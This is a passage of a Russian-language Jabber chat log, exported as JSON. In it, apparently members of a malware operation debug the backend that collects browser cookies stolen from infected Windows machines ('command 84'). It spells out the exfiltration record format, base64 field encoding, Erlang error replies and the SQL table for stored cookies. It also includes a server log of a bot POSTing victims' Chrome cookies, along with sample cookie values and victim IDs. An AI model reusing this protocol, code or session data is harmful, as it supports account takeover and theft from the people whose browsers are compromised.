{
    "2021-08-27T13:16:57.476717": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "defender@q3mcco35auwcstmt.onion/Psi+ приглашает вас в комнату ttrr@conference.q3mcco35auwcstmt.onion"
    },
    "2021-08-30T14:54:14.193827": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "defender@q3mcco35auwcstmt.onion/Psi+ приглашает вас в комнату ttrr@conference.q3mcco35auwcstmt.onion"
    },
    "2021-08-30T19:16:52.565691": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "defender@q3mcco35auwcstmt.onion/Psi+ приглашает вас в комнату ttrr@conference.q3mcco35auwcstmt.onion"
    },
    "2021-08-30T19:30:48.729191": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "defender@q3mcco35auwcstmt.onion/Psi+ приглашает вас в комнату ttrr@conference.q3mcco35auwcstmt.onion"
    },
    "2021-08-31T08:20:34.375240": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "ну и ?"
    },
    "2021-08-31T08:20:44.479413": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "одному мне больше всез надо ?"
    },
    "2021-08-31T08:21:25.224989": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "со вчера вечера что-то писали тут?"
    },
    "2021-08-31T08:23:54.169383": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "zulas: скинь еще раз кусок того POSTа, который был отвергнут бэком"
    },
    "2021-08-31T08:24:17.351460": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "А тут истории нет?\nПисал по поводу новых полей в записи куки"
    },
    "2021-08-31T08:24:26.072343": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "нету истории"
    },
    "2021-08-31T08:26:45.197179": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "ну так на чем остановились?"
    },
    "2021-08-31T08:27:19.304461": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "я остановился на этом: вот был POST, с виду нормальный, бэк на него 403 сказал. Я попросил зуласа сказать что в нем не так"
    },
    "2021-08-31T08:27:38.958544": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "а я попросил расширить лог . чтобы логировало ответ"
    },
    "2021-08-31T08:27:51.224234": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "и размер запроса"
    },
    "2021-08-31T08:29:36.044939": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "а ты steller ?"
    },
    "2021-08-31T08:31:18.950903": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Писал по поводу новых полей в записи куки"
    },
    "2021-08-31T08:33:03.543475": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "что именно?"
    },
    "2021-08-31T08:33:15.477374": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "403 встречалась раньше ошибка\n-----------CJLVIYOINTQPMYSU\nContent-Disposition: form-data; name=\"data\"\n\nuser|Chrome|.google.com|ANID|\tdjEw171ep2SDF+UMAcWRRWBcsbp5H34/V0frREuTTKAE2F3BXw3fVVHhgYgcKidlSSPxtTs32WPiqcV/p021G67RLpNXgRDrMqljrJ16Ml1Ckwz2a2URAQ==|1588241125|1651313125|/\nuser|Chrome|.register.com|__utma|\tdjEwnpzEp2a3+eOKByaEj0nLtLL7HGvIusWq1obAuia9wTCz3pPEUF6A+gFpZ3LHPf2GSueVelCwgrXMR96kV8MmLcClokQ=|1588241143|1651313173|/\n\n-----------CJLVIYOINTQPMYSU\nContent-Disposition: form-data; name=\"source\"\n\nChrome cookies\n-----------CJLVIYOINTQPMYSU--\n\n403\nMismatch parameters count!"
    },
    "2021-08-31T08:33:43.141887": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "zulas: сколько полей в куки у тебя сейчас?\nsteller: а у тебя?"
    },
    "2021-08-31T08:34:59.535377": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "[ Username, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path ]"
    },
    "2021-08-31T08:35:00.852431": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "вот поля"
    },
    "2021-08-31T08:35:14.269932": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "разделитель |"
    },
    "2021-08-31T08:35:28.667888": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Разработчик админки планирует добавить 2 поля secure, httponly в конец записи.\nСейчас:\nUsername, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path"
    },
    "2021-08-31T08:35:46.677770": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "разделители строк: [ <<10>>, <<13,10>>]"
    },
    "2021-08-31T08:37:31.170108": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "403 была, когда некоторые поля не кодировались в В64. В отстойнике они безусловно декодировались."
    },
    "2021-08-31T08:38:28.755095": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "А что по поводу максимального размера данных, он ограничен 64КБ будет?"
    },
    "2021-08-31T08:39:10.943200": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "{read_length, 64000},\n{read_timeout, 50000}\nя могу и больше сделать"
    },
    "2021-08-31T08:39:15.180511": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "таковы требоания были"
    },
    "2021-08-31T08:40:40.544509": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "50000 это в миллисекундах"
    },
    "2021-08-31T08:43:47.771157": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "В модуле нет такого ограничения. Можно разбить на несколько запросов, в принципе.\nА какие ошибки отстойник может отдавать? Их желательно как-то обрабатывать.\n403 добавил в обработку. На модуль приходили ещё 404 и 500. 500, видимо, от прокладки."
    },
    "2021-08-31T08:45:02.926038": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "при успешном приеме и добавлении в базу dero всегда выдает 200 и /1/ ?"
    },
    "2021-08-31T08:45:20.942505": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "403 ошибка формата данных?"
    },
    "2021-08-31T08:45:42.351776": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "просо 200 бывает без /1/ ?"
    },
    "2021-08-31T08:45:46.772473": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "просто"
    },
    "2021-08-31T08:46:17.068265": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "zulas:"
    },
    "2021-08-31T08:47:07.172906": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "зачем этот /1/ ?"
    },
    "2021-08-31T08:47:10.007651": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "reply(not_found, Req) ->\n { ok, Req1 } = cowboy_req:reply(404, [], <<\"Not found\">>, Req),\n Req1;\n\nreply(forbidden, Req) ->\n { ok, Req1 } = cowboy_req:reply(403, [], <<\"Forbidden\">>, Req),\n Req1;\n\nreply(missing_data, Req) ->\n { ok, Req1 } = cowboy_req:reply(403, [{<<\"Forbidden\">>, <<\"text/plain\">>}], <<\"Missing data field!\">>, Req),\n Req1;\n\nreply(missing_keys, Req) ->\n { ok, Req1 } = cowboy_req:reply(403, [{<<\"Forbidden\">>, <<\"text/plain\">>}], <<\"Missing keys field!\">>,  Req),\n Req1;\n\nreply(missing_parameters, Req) ->\n {ok,Req1} = cowboy_req:reply(403, [{<<\"Forbidden\">>, <<\"text/plain\">>}], <<\"Mismatch parameters count!\">>,  Req),\n Req1;\n\nreply(request_timeout, Req) ->\n {ok,Req1} = cowboy_req:reply(408, [{<<\"Request Timeout\">>, <<\"text/plain\">>}], <<\"Request Timeout\">>,  Req),\n Req1;"
    },
    "2021-08-31T08:47:16.137654": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "вот такие ошибки бывают"
    },
    "2021-08-31T08:47:22.017587": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "текст у вас отобразился ?"
    },
    "2021-08-31T08:47:31.377881": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "а то у меня пиджин -- и нифига"
    },
    "2021-08-31T08:47:40.870931": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "отразился"
    },
    "2021-08-31T08:48:11.909015": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "200 бывает без /1/ ?"
    },
    "2021-08-31T08:48:50.546861": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "по коду вроде не бывает"
    },
    "2021-08-31T08:48:57.444296": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "почуму спрашиваю - нужно ли в модуле проверять получение /1/ или достаточно получить статус 200 ?"
    },
    "2021-08-31T08:49:06.641516": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "[11:47:07] <hof> зачем этот /1/ ?\nтак по тз"
    },
    "2021-08-31T08:49:25.814181": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "это типа следующая команда для клиента"
    },
    "2021-08-31T08:49:29.558158": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "т.е. 200 без /1/ не бывает?"
    },
    "2021-08-31T08:49:55.932986": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "не бывает"
    },
    "2021-08-31T08:50:06.570610": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "ок, отлично"
    },
    "2021-08-31T08:50:53.721951": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "zulas: А сейчас логирование запросов http есть, их можно проверить?"
    },
    "2021-08-31T08:51:29.469315": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "есть"
    },
    "2021-08-31T08:52:48.118529": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Скинь тогда проблемные запросы."
    },
    "2021-08-31T08:58:25.518579": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "2021-08-31 11:52:22.415 [info] <0.6857.3> Data: <<\"POST /tot57/WIN-U4U2CDE99LP_W617601.8C95D48B33FF1976677889D52ABB8859/84/ HTTP/1.0\\r\\nHost: 203.76.105.227\\r\\nX-Real-IP: 203.76.105.227\\r\\nX-Forwarded-For: 203.76.105.227\\r\\nConnection: close\\r\\nContent-Length: 11059\\r\\nAccept: */*\\r\\nContent-Type: multipart/form-data; boundary=---------MOBMWAMXGTKVMATK\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\\r\\nCache-Control: no-cache\\r\\n\\r\\n-----------MOBMWAMXGTKVMATK\\r\\nContent-Disposition: form-data; name=\\\"data\\\"\\r\\n\\r\\nAdministrador|Chrome|Lmdvb2dsZS5jb20=|Q0dJQw==|RWhReFF6RkRTRUpFWDJWelRWZzVOakZOV0RrMk1TS0hBWFJsZUhRdmFIUnRiQ3hoY0hCc2FXTmhkR2x2Ymk5NGFIUnRiQ3Q0Yld3c1lYQndiR2xqWVhScGIyNHZlRzFzTzNFOU1DNDVMR2x0WVdkbEwyRjJhV1lzYVcxaFoyVXZkMlZpY0N4cGJXRm5aUzloY0c1bkxDb3ZLanR4UFRBdU9DeGhjSEJzYVdOaGRHbHZiaTl6YVdkdVpXUXRaWGhqYUdGdVoyVTdkajFpTXp0eFBUQXVPUQ==|1625670207|1641222207|L2NvbXBsZXRlL3NlYXJjaA==\\r\\nAdministrador|Chrome|Lmdvb2dsZS5jb20=|Q0dJQw==|RWhReFF6RkRTRUpFWDJWelRWZzVOakZOV0RrMk1TS0hBWFJsZUhRdmFIUnRiQ3hoY0hCc2FXTmhkR2x2Ymk5NGFIUnRiQ3Q0Yld3c1lYQndiR2xqWVhScGIyNHZlRzFzTzNFOU1DNDVMR2x0WVdkbEwyRjJhV1lzYVcxaFoyVXZkMlZpY0N4cGJXRm5aUzloY0c1bkxDb3ZLanR4UFRBdU9DeGhjSEJzYVdOaGRHbHZiaTl6YVdkdVpXUXRaWGhqYUdGdVoyVTdkajFpTXp0eFBUQXVPUQ==|1625670207|1641222207|L3NlYXJjaA==\\r\\nAdministrador|C...\">>\n State: {state,#Port<0.108426>,ranch_tcp,[cowboy_router,cowboy_handler],false,[{listener,http},{dispatch,[{'_',[],[{['...'],[],http_handler,[{limits,32768,1024,4096,102400,8529920,8388608,1024}]}]}]}],undefined,undefined,5,1,100,4096,64,4096,100,5000,1630399947415}\n ReqEmpty 0\n2021-08-31 11:52:22.416 [critical] <0.6857.3>@http_handler:handle:33 Error {badmatch,false} [{base64,decode_binary,2,[{file,\"base64.erl\"},{line,212}]},{http_handler,'-save84/3-fun-4-',5,[{file,\"src/http_handler.erl\"},{line,329}]},{lists,foreach,2,[{file,\"lists.erl\"},{line,1338}]},{http_handler,save84,3,[{file,\"src/http_handler.erl\"},{line,325}]},{http_handler,handle,2,[{file,\"src/http_handler.erl\"},{line,30}]},{cowboy_handler,handler_handle,4,[{file,\"src/cowboy_handler.erl\"},{line,111}]},{cowboy_protocol,execute,4,[{file,\"src/cowboy_protocol.erl\"},{line,443}]}]"
    },
    "2021-08-31T08:58:38.141458": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "вот . не может басе64 декодировать"
    },
    "2021-08-31T08:58:42.754898": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "не знаю какое поле"
    },
    "2021-08-31T08:59:10.719440": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "крашей больше нет"
    },
    "2021-08-31T08:59:29.608341": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "всмысли тех что хттп2"
    },
    "2021-08-31T09:05:10.044879": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Это старые данные. Сейчас модуль отправляет Username, Domain, Cookie_name, Cookie_value, Path  в В64"
    },
    "2021-08-31T09:05:45.410734": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "[ Group, IdLow, IdHigh, base64:decode(Username), Browser, Domain, base64:decode(Cookie_name), base64:decode(Cookie_value), Created, Expires, base64:decode(Path) ]);\n\nвот 4 поля декодируются только"
    },
    "2021-08-31T09:05:49.216535": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "надо все ?"
    },
    "2021-08-31T09:07:35.429985": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Нужно домен ещё декодировать"
    },
    "2021-08-31T09:08:11.255312": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "ок .. добавил в новых версиях ."
    },
    "2021-08-31T09:09:24.729867": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "<<\"INSERT INTO data84 (created_at, \\\"group\\\", id_low, id_high, username, browser, \\\"domain\\\", cookie_name, cookie_value, created, expires, path ) VALUES ( now(), $1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11 )\">> [<<\"tot138\">>,4268354464764256071,-5531770838041019469,<<149,166,247>>,<<\"Firefox\">>,<<\".mail.ru\">>,<<\"mrcu\">>,<<\"14B45890605336B122FB29388502\">>,<<\"1399543312\">>,<<\"1714903312\">>,<<\"/\">>]\n2021-08-31 11:52:59.108 [error] <0.6879.3>@db:transform:58 Error {error,error,<<\"22021\">>,<<\"invalid byte sequence for encoding \\\"UTF8\\\": 0x95\">>,[]} with query {<<\"INSERT INTO data84 (created_at, \\\"group\\\", id_low, id_high, username, browser, \\\"domain\\\", cookie_name, cookie_value, created, expires, path ) VALUES ( now(), $1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11 )\">>,[<<\"tot138\">>,4268354464764256071,-5531770838041019469,<<149,166,247>>,<<\"Firefox\">>,<<\".mail.ru\">>,<<\"mrcu\">>,<<\"14B45890605336B122FB29388502\">>,<<\"1399543312\">>,<<\"1714903312\">>,<<\"/\">>]}\n\nесть еще такое"
    },
    "2021-08-31T09:09:32.431422": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "на УТФ-8 не походит кодировка"
    },
    "2021-08-31T09:09:59.456849": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "И ещё нужно 2 поля добавить в конец записи.\nsecure, httponly\nЗначения: 0 & 1"
    },
    "2021-08-31T09:10:00.421429": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "насколько я понимаю это про <<149,166,247>>"
    },
    "2021-08-31T09:10:26.179184": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "в таблицу колонки ?"
    },
    "2021-08-31T09:10:55.308980": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Да, в запись поле, в таблицу колонки."
    },
    "2021-08-31T09:11:43.256419": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "А юникод в каком поле не проходит?"
    },
    "2021-08-31T09:20:09.637689": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": ",<<149,166,247>> я думаю вот это не может быть юникодом"
    },
    "2021-08-31T09:20:45.227992": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "юзернейм"
    },
    "2021-08-31T09:22:08.346394": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Похоже, пользователь. Скорее всего модуль не отправляет UTF8. Нужно проверить.\nА ты можешь в readme этот формат добавить + описание ошибок?\nМы уже много времени потратили на поиск этих ошибок из-за отсутствия описания протокола обмена."
    },
    "2021-08-31T09:23:06.136113": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "формат чего ?"
    },
    "2021-08-31T09:23:49.264617": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "в каталог doc есть некоторое описалово"
    },
    "2021-08-31T09:23:54.885866": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Кукисов, например. Ещё бы хорошо остальные данные проверить."
    },
    "2021-08-31T09:24:07.889907": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Там кукисы описаны?"
    },
    "2021-08-31T09:24:16.336160": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "какие кукисы ?"
    },
    "2021-08-31T09:24:39.286637": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Куки, печенюшки"
    },
    "2021-08-31T09:24:57.063840": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "я понял что такое куки, но к чему ты это говоришь ?"
    },
    "2021-08-31T09:25:05.870553": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "1. Создать новую команду для получения данных куки. Например, код команды 84\n\n2. Создать таблицу для хранения данных (псевдокод SQL):\nCREATE TABLE cookies (\n  id SERIAL,\n  username VARCHAR(255),\n  browser VARCHAR(255)\n  domain VARCHAR(255)\n  cookie_name VARCHAR(255)\n  cookie_value VARCHAR(255)\n  created DATETIME,\n  expires DATETIME,\n  path VARCHAR(255)\n);\n\n3. Обеспечить прием данных в следующем формате:\n- простой текст, разделенный на строки.\nРазделитель строк - может быть как UNIX, так и DOS.\nОдна строка - одна запись.\nРазделитель полей в записи - вертикальная черта |\nФормат записи:\n\nusername|browser|domain|cookie_name|cookie_value|created|expires|path\\r\\n\n\nгде\n\nusername     - имя пользователя\nbrowser      - код броузера (enum = chrome|ff|ie|edge)\ndomain       - домен куки\ncookie_name  - имя куки\ncookie_value - значение куки\ncreated      - дата-время создания, Unix time\nexpires      - дата-время истечения, Unix time\npath         - путь URI"
    },
    "2021-08-31T09:26:49.568401": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "К тому, что у меня не было этого дока. Где описание В64? Это часть формата."
    },
    "2021-08-31T09:28:37.291160": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "нету про базе64 .. сами добавили очевидно"
    },
    "2021-08-31T09:28:51.261199": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "чтобы экранировать символы"
    },
    "2021-08-31T09:29:50.575904": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Ну, вот это и нужно в доку добавить.\ncreated у нас в секундах?"
    },
    "2021-08-31T09:30:27.365266": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "created_at я ставлю сам как NOW()"
    },
    "2021-08-31T09:30:36.634016": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Не догадываться же, как там отстойник обрабатывает, верно?"
    },
    "2021-08-31T09:31:00.363102": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "а .есть другой .."
    },
    "2021-08-31T09:31:02.582692": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "щас посмотрю"
    },
    "2021-08-31T09:31:21.650828": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "А NOW() в секундах?"
    },
    "2021-08-31T09:32:35.412763": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "забей на NOW() это другое"
    },
    "2021-08-31T09:36:27.498482": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "CREATE TABLE public.data84 (\n    id_low bigint NOT NULL,\n    id_high bigint NOT NULL,\n    \"group\" character varying(64),\n    created_at timestamp without time zone,\n    username text,\n    browser text,\n    domain text,\n    cookie_name text,\n    cookie_value text,\n    created text,\n    expires text,\n    path text\n);"
    },
    "2021-08-31T09:36:31.363569": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "вот таблица"
    },
    "2021-08-31T09:36:37.404650": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "created - просто текст"
    },
    "2021-08-31T09:36:41.641451": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "нету про базе64 .. сами добавили очевидно \nНу, не для всех очевидно ) У нас каждый своей частью работы занимается, кто там что правит - зачастую неизвестно."
    },
    "2021-08-31T09:36:43.348714": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "всё - просто текст"
    },
    "2021-08-31T09:37:34.038982": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "> У нас каждый своей частью работы занимается, кто там что правит - зачастую неизвестно.  \nочевидно не я один это добавлял и не только на моей стороне, иначе не работало бы.\nкоду уже 5 лет"
    },
    "2021-08-31T09:39:30.946859": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Ну, это тоже не очевидно)\nПо факту ошибки посыпались. Документация не полная."
    },
    "2021-08-31T09:41:31.312572": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "где же ты был )"
    },
    "2021-08-31T10:40:22.322029": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Zulas ты под новые поля базу тоже будешь менять?\nЕсли да то просьба этого не делать, я веду миграции и хотелось бы чтобы все изменения в базе в них были отражены."
    },
    "2021-08-31T10:40:58.855012": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Я написал миграции под два поля secure и httponly"
    },
    "2021-08-31T10:41:19.042292": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Оба логических."
    },
    "2021-08-31T10:41:50.952937": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "не буду делать ."
    },
    "2021-08-31T10:41:53.238863": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "и в 90 команду добавились новые поля"
    },
    "2021-08-31T10:42:06.309350": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "ты базу на рабочем уже поменял ?я могу слить дамп ?"
    },
    "2021-08-31T10:42:24.071279": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "поля не будут сохраняться, если их больше?"
    },
